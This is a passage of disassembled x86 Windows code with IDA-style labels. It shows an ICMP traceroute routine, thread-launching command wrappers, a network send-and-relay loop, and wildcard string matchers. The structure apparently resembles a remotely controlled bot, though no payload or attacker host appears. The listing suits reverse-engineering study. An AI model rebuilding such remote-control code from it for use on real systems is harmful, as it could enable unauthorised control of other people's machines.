call ds:dword_417064 ; RtlGetLastWin32Error
mov ecx, [ebp+arg_4]
mov [ecx], eax
jmp short loc_409DA4
; ---------------------------------------------------------------------------
loc_409D8D: ; CODE XREF: sub_409CB1+CD�j
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
mov ecx, [ecx]
mov [eax+4], ecx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
mov ecx, [ecx+8]
mov [eax+8], ecx
loc_409DA4: ; CODE XREF: sub_409CB1+DA�j
push [ebp+var_1C]
call ds:dword_41E3D4
mov eax, [ebp+var_C]
mov [ebp+var_30], eax
push [ebp+var_30]
call sub_416DCC ; ??3@YAXPAX@Z
pop ecx
mov eax, [ebp+var_10]
mov [ebp+var_34], eax
push [ebp+var_34]
call sub_416DCC ; ??3@YAXPAX@Z
pop ecx
mov eax, [ebp+var_8]
locret_409DCE: ; CODE XREF: sub_409CB1+22�j
leave
retn
sub_409CB1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409DD0 proc near ; DATA XREF: sub_40A1A7+FD�o
var_2F0 = dword ptr -2F0h
var_2EC = dword ptr -2ECh
var_2E8 = dword ptr -2E8h
var_2E4 = dword ptr -2E4h
var_2E0 = dword ptr -2E0h
var_2DC = dword ptr -2DCh
var_2D8 = dword ptr -2D8h
var_2D4 = dword ptr -2D4h
var_2D0 = dword ptr -2D0h
var_2CC = dword ptr -2CCh
var_2C8 = dword ptr -2C8h
var_2C4 = dword ptr -2C4h
var_2C0 = dword ptr -2C0h
var_2BC = dword ptr -2BCh
var_2B8 = dword ptr -2B8h
var_2B4 = dword ptr -2B4h
var_2B0 = byte ptr -2B0h
var_10D = byte ptr -10Dh
var_D = byte ptr -0Dh
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 2F0h
push 2ACh
push [ebp+arg_0]
lea eax, [ebp+var_2B0]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
movzx eax, ds:byte_41E3E0
test eax, eax
jnz short loc_409E6D
push offset aIcmp_dll ; "ICMP.DLL"
call ds:dword_417054 ; LoadLibraryA
mov ds:dword_41E3D0, eax
cmp ds:dword_41E3D0, 0
jnz short loc_409E24
xor eax, eax
jmp locret_40A1A3
; ---------------------------------------------------------------------------
loc_409E24: ; CODE XREF: sub_409DD0+4B�j
push offset aIcmpcreatefile ; "IcmpCreateFile"
push ds:dword_41E3D0
call ds:dword_417058 ; GetProcAddress
mov ds:dword_41E3CC, eax
push offset aIcmpsendecho ; "IcmpSendEcho"
push ds:dword_41E3D0
call ds:dword_417058 ; GetProcAddress
mov ds:dword_41E3D8, eax
push offset aIcmpclosehandl ; "IcmpCloseHandle"
push ds:dword_41E3D0
call ds:dword_417058 ; GetProcAddress
mov ds:dword_41E3D4, eax
mov ds:byte_41E3E0, 1
loc_409E6D: ; CODE XREF: sub_409DD0+32�j
cmp ds:dword_41E3CC, 0
jnz short loc_409E7D
xor eax, eax
jmp locret_40A1A3
; ---------------------------------------------------------------------------
loc_409E7D: ; CODE XREF: sub_409DD0+A4�j
cmp ds:dword_41E3D8, 0
jnz short loc_409E8D
xor eax, eax
jmp locret_40A1A3
; ---------------------------------------------------------------------------
loc_409E8D: ; CODE XREF: sub_409DD0+B4�j
cmp ds:dword_41E3D4, 0
jnz short loc_409E9D
xor eax, eax
jmp locret_40A1A3
; ---------------------------------------------------------------------------
loc_409E9D: ; CODE XREF: sub_409DD0+C4�j
lea eax, [ebp+var_10D]
mov [ebp+var_2B8], eax
push [ebp+var_2B8]
call ds:dword_417244 ; inet_addr
mov [ebp+var_2BC], eax
cmp [ebp+var_2BC], 0FFFFFFFFh
jnz short loc_409F18
push [ebp+var_2B8]
call ds:dword_41723C ; gethostbyname
mov [ebp+var_2C0], eax
cmp [ebp+var_2C0], 0
jz short loc_409F06
mov eax, [ebp+var_2C0]
movsx eax, word ptr [eax+0Ah]
push eax
mov eax, [ebp+var_2C0]
mov eax, [eax+0Ch]
push dword ptr [eax]
lea eax, [ebp+var_2BC]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
jmp short loc_409F18
; ---------------------------------------------------------------------------
loc_409F06: ; CODE XREF: sub_409DD0+10D�j
push offset aCouldNotResolv ; "Could not resolve name"
call sub_416DD8 ; printf
pop ecx
xor eax, eax
jmp locret_40A1A3
; ---------------------------------------------------------------------------
loc_409F18: ; CODE XREF: sub_409DD0+F2�j
; sub_409DD0+134�j
and [ebp+var_4], 0
mov byte ptr [ebp+var_2B4], 1
jmp short loc_409F33
; ---------------------------------------------------------------------------
loc_409F25: ; CODE XREF: sub_409DD0:loc_40A19C�j
mov al, byte ptr [ebp+var_2B4]
add al, 1
mov byte ptr [ebp+var_2B4], al
loc_409F33: ; CODE XREF: sub_409DD0+153�j
movzx eax, byte ptr [ebp+var_2B4]
movzx ecx, [ebp+var_D]
cmp eax, ecx
jg loc_40A1A1
cmp [ebp+var_4], 0
jnz loc_40A1A1
and [ebp+var_2EC], 0
or [ebp+var_2E4], 0FFFFFFFFh
and [ebp+var_2E0], 0
and [ebp+var_2DC], 0
and [ebp+var_2D0], 0
and [ebp+var_2C8], 0
and [ebp+var_2CC], 0
and [ebp+var_2D8], 0
and [ebp+var_2D4], 0
jmp short loc_409F9E
; ---------------------------------------------------------------------------
loc_409F91: ; CODE XREF: sub_409DD0:loc_40A04E�j
mov eax, [ebp+var_2D4]
inc eax
mov [ebp+var_2D4], eax
loc_409F9E: ; CODE XREF: sub_409DD0+1BF�j
mov eax, [ebp+var_2D4]
cmp eax, [ebp+var_8]
jnb loc_40A053
cmp [ebp+var_2D8], 0
jnz loc_40A053
push 20h
push [ebp+var_C]
push [ebp+var_2B4]
lea eax, [ebp+var_2CC]
push eax
push [ebp+var_2BC]
call sub_409CB1
add esp, 14h
test eax, eax
jz short loc_40A047
cmp [ebp+var_2CC], 0
jnz short loc_40A02F
mov eax, [ebp+var_2D0]
add eax, [ebp+var_2C4]
mov [ebp+var_2D0], eax
mov eax, [ebp+var_2C4]
cmp eax, [ebp+var_2E4]
jnb short loc_40A013
mov eax, [ebp+var_2C4]
mov [ebp+var_2E4], eax
loc_40A013: ; CODE XREF: sub_409DD0+235�j
mov eax, [ebp+var_2C4]
cmp eax, [ebp+var_2DC]
jbe short loc_40A02D
mov eax, [ebp+var_2C4]
mov [ebp+var_2DC], eax
loc_40A02D: ; CODE XREF: sub_409DD0+24F�j
jmp short loc_40A045
; ---------------------------------------------------------------------------
loc_40A02F: ; CODE XREF: sub_409DD0+215�j
mov eax, [ebp+var_2CC]
mov [ebp+var_2EC], eax
mov [ebp+var_2D8], 1
loc_40A045: ; CODE XREF: sub_409DD0:loc_40A02D�j
jmp short loc_40A04E
; ---------------------------------------------------------------------------
loc_40A047: ; CODE XREF: sub_409DD0+20C�j
xor eax, eax
jmp locret_40A1A3
; ---------------------------------------------------------------------------
loc_40A04E: ; CODE XREF: sub_409DD0:loc_40A045�j
jmp loc_409F91
; ---------------------------------------------------------------------------
loc_40A053: ; CODE XREF: sub_409DD0+1D7�j
; sub_409DD0+1E4�j
mov eax, [ebp+var_2C8]
mov [ebp+var_2E8], eax
cmp [ebp+var_2EC], 0
jnz short loc_40A07B
mov eax, [ebp+var_2D0]
xor edx, edx
div [ebp+var_8]
mov [ebp+var_2E0], eax
jmp short loc_40A090
; ---------------------------------------------------------------------------
loc_40A07B: ; CODE XREF: sub_409DD0+296�j
and [ebp+var_2E4], 0
and [ebp+var_2E0], 0
and [ebp+var_2DC], 0
loc_40A090: ; CODE XREF: sub_409DD0+2A9�j
cmp [ebp+var_2EC], 0
jnz loc_40A165
push 2
push 4
lea eax, [ebp+var_2E8]
push eax
call ds:dword_417220 ; gethostbyaddr
mov [ebp+var_2F0], eax
cmp [ebp+var_2F0], 0
jz short loc_40A115
movzx eax, byte ptr [ebp+var_2E8+3]
push eax
movzx eax, byte ptr [ebp+var_2E8+2]
push eax
movzx eax, byte ptr [ebp+var_2E8+1]
push eax
movzx eax, byte ptr [ebp+var_2E8]
push eax
mov eax, [ebp+var_2F0]
push dword ptr [eax]
push [ebp+var_2DC]
push [ebp+var_2E0]
push [ebp+var_2E4]
movzx eax, byte ptr [ebp+var_2B4]
push eax
push offset dword_419594
lea eax, [ebp+var_2B0]
push eax
call sub_40D53F
add esp, 2Ch
jmp short loc_40A163
; ---------------------------------------------------------------------------
loc_40A115: ; CODE XREF: sub_409DD0+2EB�j
movzx eax, byte ptr [ebp+var_2E8+3]
push eax
movzx eax, byte ptr [ebp+var_2E8+2]
push eax
movzx eax, byte ptr [ebp+var_2E8+1]
push eax
movzx eax, byte ptr [ebp+var_2E8]
push eax
push [ebp+var_2DC]
push [ebp+var_2E0]
push [ebp+var_2E4]
movzx eax, byte ptr [ebp+var_2B4]
push eax
push offset dword_419568
lea eax, [ebp+var_2B0]
push eax
call sub_40D53F
add esp, 28h
loc_40A163: ; CODE XREF: sub_409DD0+343�j
jmp short loc_40A187
; ---------------------------------------------------------------------------
loc_40A165: ; CODE XREF: sub_409DD0+2C7�j
push [ebp+var_2EC]
movzx eax, byte ptr [ebp+var_2B4]
push eax
push offset dword_419540
lea eax, [ebp+var_2B0]
push eax
call sub_40D53F
add esp, 10h
loc_40A187: ; CODE XREF: sub_409DD0:loc_40A163�j
mov eax, [ebp+var_2BC]
cmp eax, [ebp+var_2E8]
jnz short loc_40A19C
mov [ebp+var_4], 1
loc_40A19C: ; CODE XREF: sub_409DD0+3C3�j
jmp loc_409F25
; ---------------------------------------------------------------------------
loc_40A1A1: ; CODE XREF: sub_409DD0+170�j
; sub_409DD0+17A�j
xor eax, eax
locret_40A1A3: ; CODE XREF: sub_409DD0+4F�j
; sub_409DD0+A8�j ...
leave
retn 4
sub_409DD0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A1A7 proc near ; CODE XREF: sub_40A9CF+FAE�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 18h
cmp [ebp+arg_4], 0
jnz short loc_40A1C7
push offset unk_419618
push [ebp+arg_0]
call sub_40D53F
pop ecx
pop ecx
jmp locret_40A2D0
; ---------------------------------------------------------------------------
loc_40A1C7: ; CODE XREF: sub_40A1A7+A�j
push 2ACh
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_40A1E0
jmp locret_40A2D0
; ---------------------------------------------------------------------------
loc_40A1E0: ; CODE XREF: sub_40A1A7+32�j
push 1A3h
push [ebp+arg_0]
push [ebp+var_4]
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_4]
mov eax, [ebp+var_4]
add eax, 1A3h
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
cmp [ebp+arg_8], 0
jz short loc_40A22A
push [ebp+arg_8]
call sub_416B9C ; atoi
pop ecx
cmp eax, 0FFh
jg short loc_40A22A
push [ebp+arg_8]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_10], eax
jmp short loc_40A231
; ---------------------------------------------------------------------------
loc_40A22A: ; CODE XREF: sub_40A1A7+63�j
; sub_40A1A7+73�j
mov [ebp+var_10], 1Eh
loc_40A231: ; CODE XREF: sub_40A1A7+81�j
mov eax, [ebp+var_4]
mov cl, byte ptr [ebp+var_10]
mov [eax+2A3h], cl
cmp [ebp+arg_C], 0
jz short loc_40A261
push [ebp+arg_C]
call sub_416B9C ; atoi
pop ecx
cmp eax, 927C0h
jg short loc_40A261
push [ebp+arg_C]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_14], eax
jmp short loc_40A268
; ---------------------------------------------------------------------------
loc_40A261: ; CODE XREF: sub_40A1A7+9A�j
; sub_40A1A7+AA�j
mov [ebp+var_14], 7530h
loc_40A268: ; CODE XREF: sub_40A1A7+B8�j
mov eax, [ebp+var_4]
mov ecx, [ebp+var_14]
mov [eax+2A4h], ecx
cmp [ebp+arg_10], 0
jz short loc_40A288
push [ebp+arg_10]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_18], eax
jmp short loc_40A28F
; ---------------------------------------------------------------------------
loc_40A288: ; CODE XREF: sub_40A1A7+D1�j
mov [ebp+var_18], 3
loc_40A28F: ; CODE XREF: sub_40A1A7+DF�j
mov eax, [ebp+var_4]
mov ecx, [ebp+var_18]
mov [eax+2A8h], ecx
lea eax, [ebp+var_C]
push eax
push 0
push [ebp+var_4]
push offset sub_409DD0
push 0
push 0
call ds:dword_4170B4 ; CreateThread
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_40A2C7
push [ebp+var_4]
call sub_416B4C ; free
pop ecx
jmp short locret_40A2D0
; ---------------------------------------------------------------------------
loc_40A2C7: ; CODE XREF: sub_40A1A7+113�j
push [ebp+var_8]
call ds:dword_4170A4 ; CloseHandle
locret_40A2D0: ; CODE XREF: sub_40A1A7+1B�j
; sub_40A1A7+34�j ...
leave
retn
sub_40A1A7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A2D2 proc near ; CODE XREF: sub_40A4A4+30�p
var_111C = dword ptr -111Ch
var_1118 = dword ptr -1118h
var_1114 = byte ptr -1114h
var_114 = byte ptr -114h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 111Ch
call sub_416BC0
mov eax, [ebp+arg_0]
add eax, 4
push eax
mov eax, [ebp+arg_0]
add eax, 104h
push eax
mov eax, [ebp+arg_0]
mov eax, [eax]
push dword ptr [eax]
push offset dword_41966C
mov eax, [ebp+arg_0]
add eax, 204h
push eax
call sub_40D53F
add esp, 14h
push 2710h
push 0
push offset dword_419668
mov eax, [ebp+arg_0]
add eax, 104h
push eax
call sub_4050EA
add esp, 10h
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_40A339
xor al, al
jmp locret_40A4A2
; ---------------------------------------------------------------------------
loc_40A339: ; CODE XREF: sub_40A2D2+5E�j
mov eax, [ebp+arg_0]
add eax, 4
push eax
push offset dword_419660
lea eax, [ebp+var_114]
push eax
call ds:dword_4171E0 ; wsprintfA
add esp, 0Ch
lea eax, [ebp+var_114]
push eax
call sub_416B40 ; strlen
pop ecx
inc eax
push eax
lea eax, [ebp+var_114]
push eax
push [ebp+var_8]
call sub_4053BF
add esp, 0Ch
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_40A38F
push [ebp+var_8]
call sub_40538D
pop ecx
xor al, al
jmp locret_40A4A2
; ---------------------------------------------------------------------------
loc_40A38F: ; CODE XREF: sub_40A2D2+AB�j
push 1000h
lea eax, [ebp+var_1114]
push eax
push [ebp+var_8]
call sub_4053DC
add esp, 0Ch
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jz short loc_40A3B5
cmp [ebp+var_C], 0FFFFFFFFh
jnz short loc_40A3C5
loc_40A3B5: ; CODE XREF: sub_40A2D2+DB�j
push [ebp+var_8]
call sub_40538D
pop ecx
xor al, al
jmp locret_40A4A2
; ---------------------------------------------------------------------------
loc_40A3C5: ; CODE XREF: sub_40A2D2+E1�j
lea eax, [ebp+var_1114]
mov [ebp+var_10], eax
loc_40A3CE: ; CODE XREF: sub_40A2D2:loc_40A492�j
mov eax, [ebp+var_10]
mov [ebp+var_111C], eax
mov eax, [ebp+var_111C]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_40A3E9
jmp loc_40A497
; ---------------------------------------------------------------------------
loc_40A3E9: ; CODE XREF: sub_40A2D2+110�j
push [ebp+var_111C]
call sub_407B5E
pop ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_111C]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_40A41B
push offset dword_418F4C
push [ebp+var_111C]
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40A442
loc_40A41B: ; CODE XREF: sub_40A2D2+131�j
mov eax, [ebp+var_111C]
lea ecx, [ebp+var_1114]
cmp eax, ecx
jz short loc_40A440
push offset dword_41965C
mov eax, [ebp+arg_0]
add eax, 204h
push eax
call sub_40D53F
pop ecx
pop ecx
loc_40A440: ; CODE XREF: sub_40A2D2+157�j
jmp short loc_40A458
; ---------------------------------------------------------------------------
loc_40A442: ; CODE XREF: sub_40A2D2+147�j
push [ebp+var_111C]
mov eax, [ebp+arg_0]
add eax, 204h
push eax
call sub_40D53F
pop ecx
pop ecx
loc_40A458: ; CODE XREF: sub_40A2D2:loc_40A440�j
push 3E8h
call ds:dword_41709C ; Sleep
push offset dword_41E3A8
call sub_409C6C
pop ecx
mov eax, [ebp+arg_0]
mov eax, [eax]
mov eax, [eax+4]
mov [ebp+var_1118], eax
push offset dword_41E3A8
call sub_409C7A
pop ecx
cmp [ebp+var_1118], 0
jz short loc_40A492
jmp short loc_40A497
; ---------------------------------------------------------------------------
loc_40A492: ; CODE XREF: sub_40A2D2+1BC�j
jmp loc_40A3CE
; ---------------------------------------------------------------------------
loc_40A497: ; CODE XREF: sub_40A2D2+112�j
; sub_40A2D2+1BE�j
push [ebp+var_8]
call sub_40538D
pop ecx
mov al, 1
locret_40A4A2: ; CODE XREF: sub_40A2D2+62�j
; sub_40A2D2+B8�j ...
leave
retn
sub_40A2D2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A4A4 proc near ; DATA XREF: sub_40A50E+A1�o
var_3A8 = dword ptr -3A8h
var_2A4 = byte ptr -2A4h
var_1A4 = byte ptr -1A4h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 3A8h
push 3A7h
push [ebp+arg_0]
lea eax, [ebp+var_3A8]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
lea eax, [ebp+var_3A8]
push eax
call sub_40A2D2
pop ecx
movzx eax, al
test eax, eax
jnz short loc_40A4FC
lea eax, [ebp+var_2A4]
push eax
push offset dword_419698
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
loc_40A4FC: ; CODE XREF: sub_40A4A4+3B�j
push [ebp+var_3A8]
call sub_409763
pop ecx
xor eax, eax
leave
retn 4
sub_40A4A4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A50E proc near ; CODE XREF: sub_40A9CF+FE3�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_4], 0
jnz short loc_40A51D
jmp locret_40A5BC
; ---------------------------------------------------------------------------
loc_40A51D: ; CODE XREF: sub_40A50E+8�j
push 3A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_40A536
jmp locret_40A5BC
; ---------------------------------------------------------------------------
loc_40A536: ; CODE XREF: sub_40A50E+21�j
push [ebp+arg_4]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
cmp [ebp+arg_8], 0
jz short loc_40A562
push [ebp+arg_8]
mov eax, [ebp+var_4]
add eax, 104h
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_40A586
; ---------------------------------------------------------------------------
loc_40A562: ; CODE XREF: sub_40A50E+3D�j
push offset dword_4196D4
mov eax, [ebp+var_4]
add eax, 104h
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
mov eax, [ebp+var_4]
add eax, 104h
push eax
call sub_4105FB
pop ecx
loc_40A586: ; CODE XREF: sub_40A50E+52�j
push 1A3h
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 204h
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_4]
push [ebp+arg_8]
push offset dword_4196B4
push 0
push [ebp+var_4]
push offset sub_40A4A4
call sub_4095A4
add esp, 18h
locret_40A5BC: ; CODE XREF: sub_40A50E+A�j
; sub_40A50E+23�j
leave
retn
sub_40A50E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A5BE proc near ; CODE XREF: sub_40A5BE+32�p
; sub_40A5BE+70�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_40A603
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_40A5DD
mov al, 1
jmp locret_40A6E9
; ---------------------------------------------------------------------------
loc_40A5DD: ; CODE XREF: sub_40A5BE+16�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 2Ah
jnz short loc_40A5FC
mov eax, [ebp+arg_4]
inc eax
push eax
push [ebp+arg_0]
call sub_40A5BE
pop ecx
pop ecx
jmp locret_40A6E9
; ---------------------------------------------------------------------------
loc_40A5FC: ; CODE XREF: sub_40A5BE+28�j
xor al, al
jmp locret_40A6E9
; ---------------------------------------------------------------------------
loc_40A603: ; CODE XREF: sub_40A5BE+C�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_40A614
xor al, al
jmp locret_40A6E9
; ---------------------------------------------------------------------------
loc_40A614: ; CODE XREF: sub_40A5BE+4D�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
mov ecx, [ebp+arg_4]
movsx ecx, byte ptr [ecx]
cmp eax, ecx
jnz short loc_40A63A
mov eax, [ebp+arg_4]
inc eax
push eax
mov eax, [ebp+arg_0]
inc eax
push eax
call sub_40A5BE
pop ecx
pop ecx
jmp locret_40A6E9
; ---------------------------------------------------------------------------
loc_40A63A: ; CODE XREF: sub_40A5BE+64�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 3Fh
jnz short loc_40A65B
mov eax, [ebp+arg_4]
inc eax
push eax
mov eax, [ebp+arg_0]
inc eax
push eax
call sub_40A5BE
pop ecx
pop ecx
jmp locret_40A6E9
; ---------------------------------------------------------------------------
loc_40A65B: ; CODE XREF: sub_40A5BE+85�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 23h
jnz short loc_40A69E
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 30h
jl short loc_40A67C
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 39h
jle short loc_40A687
loc_40A67C: ; CODE XREF: sub_40A5BE+B1�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 23h
jnz short loc_40A69A
loc_40A687: ; CODE XREF: sub_40A5BE+BC�j
mov eax, [ebp+arg_4]
inc eax
push eax
mov eax, [ebp+arg_0]
inc eax
push eax
call sub_40A5BE
pop ecx
pop ecx
jmp short locret_40A6E9
; ---------------------------------------------------------------------------
loc_40A69A: ; CODE XREF: sub_40A5BE+C7�j
xor al, al
jmp short locret_40A6E9
; ---------------------------------------------------------------------------
loc_40A69E: ; CODE XREF: sub_40A5BE+A6�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 2Ah
jnz short loc_40A6E7
and [ebp+var_4], 0
jmp short loc_40A6B6
; ---------------------------------------------------------------------------
loc_40A6AF: ; CODE XREF: sub_40A5BE:loc_40A6E5�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40A6B6: ; CODE XREF: sub_40A5BE+EF�j
mov eax, [ebp+arg_4]
inc eax
push eax
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
push eax
call sub_40A5BE
pop ecx
pop ecx
movzx eax, al
test eax, eax
jz short loc_40A6D4
mov al, 1
jmp short locret_40A6E9
; ---------------------------------------------------------------------------
loc_40A6D4: ; CODE XREF: sub_40A5BE+110�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_40A6E5
xor al, al
jmp short locret_40A6E9
; ---------------------------------------------------------------------------
loc_40A6E5: ; CODE XREF: sub_40A5BE+121�j
jmp short loc_40A6AF
; ---------------------------------------------------------------------------
loc_40A6E7: ; CODE XREF: sub_40A5BE+E9�j
xor al, al
locret_40A6E9: ; CODE XREF: sub_40A5BE+1A�j
; sub_40A5BE+39�j ...
leave
retn
sub_40A5BE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A6EB proc near ; CODE XREF: sub_4097A7+10A�p
; sub_4098F3+155�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_40A730
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_40A70A
mov al, 1
jmp locret_40A86B
; ---------------------------------------------------------------------------
loc_40A70A: ; CODE XREF: sub_40A6EB+16�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 2Ah
jnz short loc_40A729
mov eax, [ebp+arg_4]
inc eax
push eax
push [ebp+arg_0]
call sub_40A6EB
pop ecx
pop ecx
jmp locret_40A86B
; ---------------------------------------------------------------------------
loc_40A729: ; CODE XREF: sub_40A6EB+28�j
xor al, al
jmp locret_40A86B
; ---------------------------------------------------------------------------
loc_40A730: ; CODE XREF: sub_40A6EB+C�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_40A741
xor al, al
jmp locret_40A86B
; ---------------------------------------------------------------------------
loc_40A741: ; CODE XREF: sub_40A6EB+4D�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
mov ecx, [ebp+arg_4]
movsx ecx, byte ptr [ecx]
cmp eax, ecx
jnz short loc_40A767
mov eax, [ebp+arg_4]
inc eax
push eax
mov eax, [ebp+arg_0]
inc eax
push eax
call sub_40A6EB
pop ecx
pop ecx
jmp locret_40A86B
; ---------------------------------------------------------------------------
loc_40A767: ; CODE XREF: sub_40A6EB+64�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 41h
jl short loc_40A77D
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 5Ah
jle short loc_40A793
loc_40A77D: ; CODE XREF: sub_40A6EB+85�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 61h
jl short loc_40A7BC
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 7Ah
jg short loc_40A7BC
loc_40A793: ; CODE XREF: sub_40A6EB+90�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
xor eax, 20h
mov ecx, [ebp+arg_4]
movsx ecx, byte ptr [ecx]
cmp eax, ecx
jnz short loc_40A7BC
mov eax, [ebp+arg_4]
inc eax
push eax
mov eax, [ebp+arg_0]
inc eax
push eax
call sub_40A6EB
pop ecx
pop ecx
jmp locret_40A86B
; ---------------------------------------------------------------------------
loc_40A7BC: ; CODE XREF: sub_40A6EB+9B�j
; sub_40A6EB+A6�j ...
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 3Fh
jnz short loc_40A7DD
mov eax, [ebp+arg_4]
inc eax
push eax
mov eax, [ebp+arg_0]
inc eax
push eax
call sub_40A6EB
pop ecx
pop ecx
jmp locret_40A86B
; ---------------------------------------------------------------------------
loc_40A7DD: ; CODE XREF: sub_40A6EB+DA�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 23h
jnz short loc_40A820
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 30h
jl short loc_40A7FE
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 39h
jle short loc_40A809
loc_40A7FE: ; CODE XREF: sub_40A6EB+106�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 23h
jnz short loc_40A81C
loc_40A809: ; CODE XREF: sub_40A6EB+111�j
mov eax, [ebp+arg_4]
inc eax
push eax
mov eax, [ebp+arg_0]
inc eax
push eax
call sub_40A6EB
pop ecx
pop ecx
jmp short locret_40A86B
; ---------------------------------------------------------------------------
loc_40A81C: ; CODE XREF: sub_40A6EB+11C�j
xor al, al
jmp short locret_40A86B
; ---------------------------------------------------------------------------
loc_40A820: ; CODE XREF: sub_40A6EB+FB�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 2Ah
jnz short loc_40A869
and [ebp+var_4], 0
jmp short loc_40A838
; ---------------------------------------------------------------------------
loc_40A831: ; CODE XREF: sub_40A6EB:loc_40A867�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40A838: ; CODE XREF: sub_40A6EB+144�j
mov eax, [ebp+arg_4]
inc eax
push eax
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
push eax
call sub_40A6EB
pop ecx
pop ecx
movzx eax, al
test eax, eax
jz short loc_40A856
mov al, 1
jmp short locret_40A86B
; ---------------------------------------------------------------------------
loc_40A856: ; CODE XREF: sub_40A6EB+165�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_40A867
xor al, al
jmp short locret_40A86B
; ---------------------------------------------------------------------------
